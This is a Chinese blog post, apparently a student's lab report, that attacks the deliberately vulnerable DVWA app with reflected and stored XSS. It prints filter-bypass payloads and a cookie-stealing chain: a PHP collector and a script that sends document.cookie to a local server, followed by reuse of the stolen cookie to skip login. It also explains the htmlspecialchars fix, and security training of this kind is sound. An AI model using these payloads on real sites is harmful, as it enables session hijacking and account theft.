实验2:跨站脚本攻击XSS

最新推荐文章于 2024-05-06 09:49:33 发布
最新推荐文章于 2024-05-06 09:49:33 发布
阅读量1.7k 收藏 31
点赞数 29
分类专栏: WEB XSS 文章标签: xss 前端 linux web web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52363821/article/details/137510674
版权
WEB 同时被 2 个专栏收录
7 篇文章 1 订阅
订阅专栏
XSS
1 篇文章 0 订阅
订阅专栏


一、实验目的与要求

  1. 能理解XSS注入原理;
  2. 能应用Low等级、Medium等级、High级别的XSS;
  3. 能理解XSS的修复。
  4. 能利用XSS盗取cookie
  5. 利用盗取的cookie绕过登陆步骤直接进入网站首页

二、实验原理与内容

1.XSS原理

     是利用网页应用程序对用户的输入没有进行足够的过滤与处理,导致恶意脚本被插入到网页中,并被浏览器解释执行。攻击者通过构造恶意的输入数据,将脚本代码注入目标网页中,并在用户浏览该页面时执行。这些脚本能够执行恶意的操作,比如窃取用户的敏感信息、伪造用户界面或篡改网页内容等。

2.实验内容

利用Kali Linux对DVWA的Reflected Cross Site Scripting (XSS)/Stored Cross Site Scripting (XSS)模块,实现利用XSS盗取cookie,并用盗取的cookie绕过登陆步骤直接进入网站首页:

  1. Low等级;
  2. Medium等级;
  3. High级别;
  4. Impossible等级的机制以及修复、防御方法。
  5. 利用XSS成功盗取DVWA网站的cookie,用盗取的cookie绕过登陆步骤直接进入DVWA网站首页。

三、实验设备与软件环境

  1. 学生笔记本;
  2. VMware WorkStation Pro;
  3. Windows7或其他Windows系统;
  4. Kali Linux 2021版本或其他Kali Linux版本;
  5. DVWA-1.9;
  6. FireFox浏览器;
  7. BurpSuit或其他抓包工具

四、实验过程与结果

一、准备工作

先启动phpstudy,把Apache和mysql启动

因为我本机自身就有安装mysql,所以我确认好开启到本机的mysql就好了,软件中的无需开启。

登录DVWA

二、实验内容

1、Low等级

将安全级别设置为low

然后我们通过(D:\Teachings\phpstudy_pro\WWW\DVWA\vulnerabilities\xss_r\source)(这是我的地址)找到low.php

来查看sourse源码:

array_key_exists()函数检查某个数组中是否存在指定的键名,如果键名存在则返回 true,如果键名不存在则返回 false。
!=为不等于运算符 , &&为与都为真是为真
这段源码:输入一个内容,点击提交,当输入不为空之后输出:Hello 加输入的内容。

GET到参数之后没有对参数进行任何处理,直接传递,以html形式呈现出来,所以直接执行JavaScript代码,从而显示出xss弹出框。

直接输入 <script>alert('xss')</script>,然后点击提交:

弹出弹框

2、Medium等级

将等级修改为中级:

查看源码:

相比于low等级,多了一个语句,可以看到,这里对输入进行了过滤,使用str_replace函数将输入中的<script>替换

为空。当GET到参数后,$name被做了更改然后重新传给了name变量。

我们可通过

1、不区分大小写这个放方法来传入参数,达到绕过的目的提交参数:
输入<ScripT>alert('xss')</script>
2、也可以通过多重嵌套:
输入<scr<script>ipt>alert(/xss/)</script>

3、High级别

将等级修改为high级别

我们查看源码:

可以看到preg_replace() 函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。

虽然无法使用<script>标签注入 XSS 代码,但是可以通过img、body等标签的事件或者iframe、src等标签的构造可利用的js代码。

1、<img src=1 onerror=alert(/xss/)>
2、<iframe onload=alert(/xss/)>

3、<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>

4、Impossible等级的机制以及修复、防御方法

修改Impossible等级:

使用htmlspecialchars() 函数把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体,防止浏览器将其作为HTML元素(特殊意义);从而防治了反射型XSS利用和危害,不能实现反射型XSS攻击。

5、利用XSS成功盗取DVWA网站的cookie

  1. 在搭建的服务器目录下创建一个cookie.php,(我的目录是:D:\Teachings\phpstudy_pro\WWW),目的是为了将获取到的cookie

输入:

<?php
  $cookie = $_GET['cookie'];
  file_put_contents('cookie.txt',$cookie);
?>

接着我们构建一个js代码:

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

通过document.cookie可以读取当前页面的cookie值,然后通过GET方法发送至攻击者服务器。

先将等级修改为low等级

然后在进入到XSS(Stored)

当在输入Message中输入恶意代码js时我们会发现有文本长度限制。

修改完成后,我们可以看到已经完整的输入了。

然后我们就可以看到会跳转到

我们可以打开cookie.txt查看我们获取的cookie值

我们用另外一个浏览器重新进入到DVWA(如果用本机测试的,先把防火墙关闭)

进入到登录界面,我们就把开发者工具打开

找到cookie然后修改里面的值

即可进入到我们的首页

至此实验就完成了。

L.Ru
关注
  • 29
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
跨站脚本攻击(XSS)实验.doc
10-04
跨站脚本攻击(XSS)实验.doc
最全--跨站脚本攻击XSS)举例和预防方法
Keep trying, keep going
04-30 1365
跨站脚本攻击XSS)是指攻击者通过,从而窃取用户信息、篡改网页内容等。。
02-XSS渗透测试步骤
最新发布
tianxiadiiw的博客
05-06 462
存储型又叫永久性xss,常见于留言板,因为存储型xss的页面会将用户输入的内容存入到数据库内,反射型xss是一次性的,而且比较容易被发现,通常恶意链接会被修改成短链接,或钓鱼图片的形式。输入后和原有的前端代码产生混淆,形成新的页面语句,并且新的页面语句能够被浏览器解析并输出。所以其他人每访问一次的时候,服务器都会从数据库将攻击者输入的内容调取到前端浏览器解析,xss原理就是开发者没有对输入内容进行过滤,导致通过攻击者进行构造的前端代码,3)查看输出位置的内容与输入内容之间的关系,构建闭合和拼接脚本。
全网最详细 XSS 跨站脚本攻击,不是过来打死我!!
liuhyusb的博客
06-21 2540
​。
通过cookie绕过登录
qq_34493876的博客
02-02 429
一个客户端对服务器进行访问的时候,服务器会发回这个客户端对应的sessionid/身份信息, 客户端必须记住这个身份信息,在下个请求中,带上身份信息,服务器就不会查验这个客户端的身份.dr.add_cookie(): 参数比较特殊, 参数必须是一个字典, 两个元素, 一个是name键值对,一个是value键值对.dr.get_cookie(): 需要传参,传入name键的值,获取到本地的一条cookie信息。参数: {'name':'','value':''}dr.get(): 发一个get请求。
XSS跨站脚本攻击(DVWA XSS攻击详解、XSS平台搭建)
tmzy1的博客
03-20 1998
XSS攻击、XSS平台搭建
Web安全XSS跨站脚本攻击
Button12138的博客
02-01 1150
XSS 攻击通常指黑客利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点
DVWA靶机,通过XSS盗取cookie登录
weixin_42786460的博客
09-15 995
DVWA靶机,通过XSS盗取cookie登录
网站攻防之CSRF和XSS跨站脚本攻击
06-04 7880
进入正题之前,先扯一番:黑客本义并非某些人以为的利用网络干坏事的人,刚开始或者说现在的很多,黑客是以技术大牛的形式存在的,也就是在网络领域有一门专场的牛人。有些黑客不干坏事而是干好事,比如利用网站的漏洞,去告诉网站开发运营者你的网站有漏洞,要修补啦,他们却并不会利用这漏洞干坏事,而是以发现漏洞追求技术快感为享受。 说是网站攻防演练,但估计这套东西已经很老很少用了,毕竟作为课程实验的实例都是“经典
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
weixin_55154866的博客
12-12 295
跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网页之时,嵌入其中Web里面的javascript代码会被执行,从而达到恶意攻击用户的目的。XSS是攻击客户端,最终受害者是用户,当然,网站管理员也是用户之一。XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是。
WEB漏洞原理】XSS 跨站脚本攻击
过期的秋刀鱼
08-26 2298
当用户访问被XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。DOM 型XSS 是一种XSS 攻击,其中攻击的代码是由于修改受害者浏览器页面的DOM 树而执行的。搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 的风险。XSS 攻击目标是客户端浏览器用户,由于浏览器的类别不同,攻击效果不同,甚至于同一款浏览器,攻击效果都不一样。浏览器的类型,版本等因素都会影响XSS 的效果。
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
web安全技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
跨站脚本攻击XSS)概述】 XSS,全称Cross Site Scripting,是一种常见的Web应用程序安全漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
跨站攻击(XSS+CSRF).docx
01-05
2. 存储型XSS:这种攻击更为危险,因为恶意脚本被存储在服务器上,然后在多个用户访问同一页面时执行。比如,攻击者在论坛发帖或评论中插入脚本,当其他用户查看时,脚本被执行。 3. DOM型XSS:此类XSS发生在客户端...
XSS跨站脚本攻击原理与实践1
08-03
本次实验旨在深入理解XSS跨站脚本攻击的原理,包括反射型、存储型和基于DOM的XSS,并掌握如何预防和检测这些攻击。通过对不同类型的XSS进行实践,学生应能了解其危害,学习如何避免在Web应用程序中引入此类漏洞。 ...
XSS基础环境及实验演示教程(适合新手)
流浪法师的博客
05-24 1326
花了一点时间,做了一个“XSS基础环境及实验演示教程”,当然教程很简单,适合刚接触和安全行业的小伙伴去认识了解XSS漏洞,并且上手实操。
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 3万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
实验三:XSS和SQL注入
yghlqgt的博客
11-27 730
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
信息安全XSS攻击
小灰的博客
02-28 938
一、概述 ​ XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。一般XSS可以分为如下几种常见类型: ​ 1.反射性XSS; ​ 2.存储型XSS; ​ 3.DOM型XSS; 二、环境 靶场:Pikachu 浏览器:火狐 三、反射型 交互的数据一般不会被存放在数据库里,一次性,所见即所得,一般出现在查询类页面等。 1.首先输入一些特殊字符
xss跨站脚本攻击实验实验(实训)结果与分析
01-01
xss跨站脚本攻击实验实验结果与分析如下: 在进行xss跨站脚本攻击实验时,我们首先构造了一个含有恶意脚本的注入网页,然后将该网页作为输入传递给目标网站。实验结果显示,攻击者成功将恶意脚本注入到目标网站中,当其他用户访问该目标网站时,恶意脚本会被执行,从而使得攻击者可以获取用户的敏感信息或进行其他不良行为。 对于实验结果的分析,可以得出以下几个结论: 1. 实验结果表明目标网站存在xss漏洞。这种漏洞的产生一般是因为目标网站未对用户输入进行充分的过滤和验证。攻击者通过在注入网页中插入恶意脚本,利用目标网站对用户输入的不当处理来实现攻击。因此,目标网站需要加强用户输入的过滤和验证,以避免类似的攻击。 2. 实验结果暴露了用户的敏感信息泄漏风险。通过成功注入恶意脚本,攻击者可以获取用户在目标网站的敏感信息,如用户名、密码等。这对用户的隐私安全构成了潜在威胁。 3. 实验结果提醒我们加强xss防护措施。为了避免类似的攻击,目标网站应当采取一系列的安全措施,包括对用户输入进行过滤和验证、设置合适的CSP(内容安全策略)等。此外,用户也应当保持警惕,避免点击可疑的链接,提高自身的网络安全意识。 在实施xss跨站脚本攻击实验中,我们能够深入了解这种攻击的原理和危害,同时也提醒我们加强安全意识和措施,以保护自身和网站的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值